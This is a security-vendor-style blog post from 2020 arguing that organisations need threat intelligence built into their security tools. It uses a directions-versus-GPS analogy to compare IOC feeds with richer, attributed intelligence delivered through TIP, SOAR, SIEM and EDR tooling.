Integrated Threat Intelligence – The New Enterprise “Must-Have”

2020-08-11 0 By SecureSteve

Remember when IT security was just a wish-list item in the corporate budget? Yeah, me either. For awhile, the checkbook was open for good security posture. These days, organizations are starting to mature around their stack. They are asking their tools to do more before they invest in something net new. Many organizations often feel they don’t have to have “the best of everything”, but having poor security is a non-starter these days.

There are key foundational elements that many organizations traditionally have felt are strongly important: Firewalls, intrusion prevention tools, web and email filters, and endpoint protection solutions are considered critical to any security posture. (Ironically, some of these “network perimeter” type solutions are beginning to change.) As organizations modernize, additional items such as advanced malware tools (usually in the form of sandboxes), next-generation AntiVirus solutions (utilizing the latest in machine learning or artificial intelligence), and security event monitoring and correlation (SIEM) have moved into the security foundation as well.

However, there is one additional item that is frequently discussed, but rarely really utilized in an environment – Threat Intelligence. In today’s modern landscape with so many alerts and dashboards, organizations are beginning to realize that useful threat intelligence is pivotal. It can help to reduce alert fatigue, and allow organizations to align their security priorities around real and validated threats.

Understanding “real” Intelligence

Say that you need to navigate your automobile to a destination you’ve never been before. You have a couple of different options to determine how to arrive at your destination. You could, for example, ask a friend for directions. This might be analogous to obtaining some IOCs in the cybersecurity sense. (more on this later)

Another option is to print off a map. This map generally contains lots more information. In fact, it might even provide some details about some of the turns. This is starting to look more like Threat Intelligence.

Today, the ultimate option is using GPS. (Did you know that Google Maps is 15 years old already?) Within the common GPS app on your phone, you can quickly get details around road conditions, traffic conditions, speed traps or construction, alternate routes, estimated times of arrival, etc. All of this is live data, ready to be consumed with nearly zero effort (simply put in your destination, and a wealth of relevant data automatically integrated into your driving activity). THIS is what truly integrated Threat Intelligence looks like.

To be fair, when everything is perfect, all three methods can get you to your destination. Yet for organizations, how often is “everything just perfect”? What if someone at your destination asks you to stop at a grocery store along the way? What if you need to find a gas station? We know cybersecurity teams must be agile to handle lots of industry changes (and an ever-changing threat landscape). If you have to integrate IOC/Threat Feeds into your environment manually, or your tool can’t even consume that data, it’s that much more difficult to understand key threat activity within your environment.

A caution around calling IOCs “intelligence”

Indicators of compromise, or IOCs, are common forms of threat information that organizations are familiar with. In fact, many companies will subscribe to ‘threat feeds’, or real-time black lists, etc. IOCs themselves are typically things like hashes, IPs, process names, and URLs that were obtained as a result of some bad activity that was captured.

The issue with this data is two-fold. One, assume you have ‘all of the bad IPs in the world’, and ‘all of the bad domains in the world’, in a list. How large do you think that list is? Probably HUGE. At some point (and at most organizations’ scale) this becomes difficult to consume, manage, etc. Plus, it is artifact data.

This leads to the second problem. This data is reactive, essentially left-over data. Sergio Caltagirone, VP of threat intelligence at security company Dragos, likens IOCs to “car exhaust” in this YouTube clip. That is, it is “what is left over after all of the bad activity has been done”. In a way, IOCs are similar to obtaining driving directions from a friend. It IS the route your friend took, which is potentially useful. Yet it’s far from dynamic, complete, or easy to use if something even slightly changes.

Attribution is critical

Many organizations think about computer malware the same way they think about bacteria and viruses. That is, “I don’t care what it looks like, I don’t care how it got here. I just want make sure I don’t get infected with it.” Just like today’s current COVID-19 events, certain breach announcements may cause some behavior changes (washing hands, cleaning more often; watching antivirus updates more closely, scanning more often, etc).

…for organizations, how often is “everything just perfect”?
SecureSteve

The issue with this perspective is that it assumes all malware and threat activities are created equal. We’ve known for years that there are different types of malware (trojans, worms, botnets, etc), and different avenues of “infection” (phishing, device connectivity, etc). Yet, if your antivirus solution shows a malware block of the file “Packed.Win32.Generic”, what the heck are you supposed to do with that?

As another example, say you’re about ready to leave the office for the weekend. All of a sudden, you get a few low-level alerts on your AV solution. Maybe those alerts show things were blocked. With your current tool set today, can you tell the difference between some commodity malware versus the beginning of a targeted threat campaign against your organization? Can you at least agree those are two different things? This is the type of attribution that threat intelligence should be providing.

Plus, not all breaches are due to malware

In 2019, 51% of the incidents that Crowdstrike (CRWD) responded to employed malware-less techniques at some point. 29% of all incidents used no malware at all. Malware-less attacks can be performed by simple scripting, PowerShell, or WMI calls.

Also, say someone has obtained administrative credentials. They can then log into the environment using a valid password. How are AntiMalware solutions supposed to handle that?

Many organizations think about computer malware the same way they think about bacteria and viruses. That is, “I don’t care what it looks like, I don’t care how it got here. I just want make sure I don’t get infected with it.”
SecureSteve

What to look for in good Threat Intelligence

Good Threat Intelligence can leave clues and maps of expected threat actor behavior. For example, say you knew that a threat actor typically attacked an environment with a targeted phishing email. That email had a link that led to a download of an Excel file containing an embedded script, with the script doing asset inventory and looking for administrative credentials. If you knew that those types of behaviors occurred and in that order, it would be much easier to be on the lookout for such activity within your environment.

When this data is properly integrated, you immediately have access to a wealth of contextual information to understand your risk exposure. You can understand, simply at a glance, if that “AV” alert you see on a Friday is a simple commodity attack, or if is a start of a bigger threat campaign targeting your organization. (For the record, cyber criminals and threat actors know when holidays and normal business hours are occurring).

Cyber criminals and threat actors know when holidays and normal business hours are occurring.
SecureSteve

Additionally, good threat intelligence should have the ability to be catered. You should be able to see intelligence as it pertains to your company vertical, company size, geographic location, countries you operate, platforms you utilize, customer base, etc. The more this data is relevant, the better you’re able to orient limited resources.

How can organizations integrate and utilize threat intelligence?

(In the heading above, I initially typed “operationalize”, instead of integrate an utilize. However, I hate those industry buzzwords, and every time I use one I die a little more inside. OK, back to it…)

First, there are dedicated Threat Intelligence Platform solutions (TIPs). These solutions usually enable some integration out of the box, with larger integrations typically available via customization and service engagements. TIPs can help to consolidate all sources of threat intelligence into a single location, and deliver actionable data to security analysts to pursue. A TIP solution coupled with a SOAR solution can help to overcome potential scaling issues than a TIP by itself.

An Orchestration and Automation (SOAR) solution, when coupled with a quality Security Information and Event Management solution (SIEM), and endpoint detection and response (EDR) solution, allows security teams to automate queries and actions across the environment based on threat alerts and events. The fidelity of the data fed into this system becomes critical.

Ultimately, however, organizations should demand higher quality threat intelligence directly within the workflow of their security tools. Within just a few clicks, security analysts should be able to understand their organizations security posture against any threat actor or behavior, and be able to identify concerning devices that may be susceptible to those threat. Again, this should be available within single clicks, or automatically. Having a link to a threat report or blog article is not sufficient in today’s fast-pasted environments.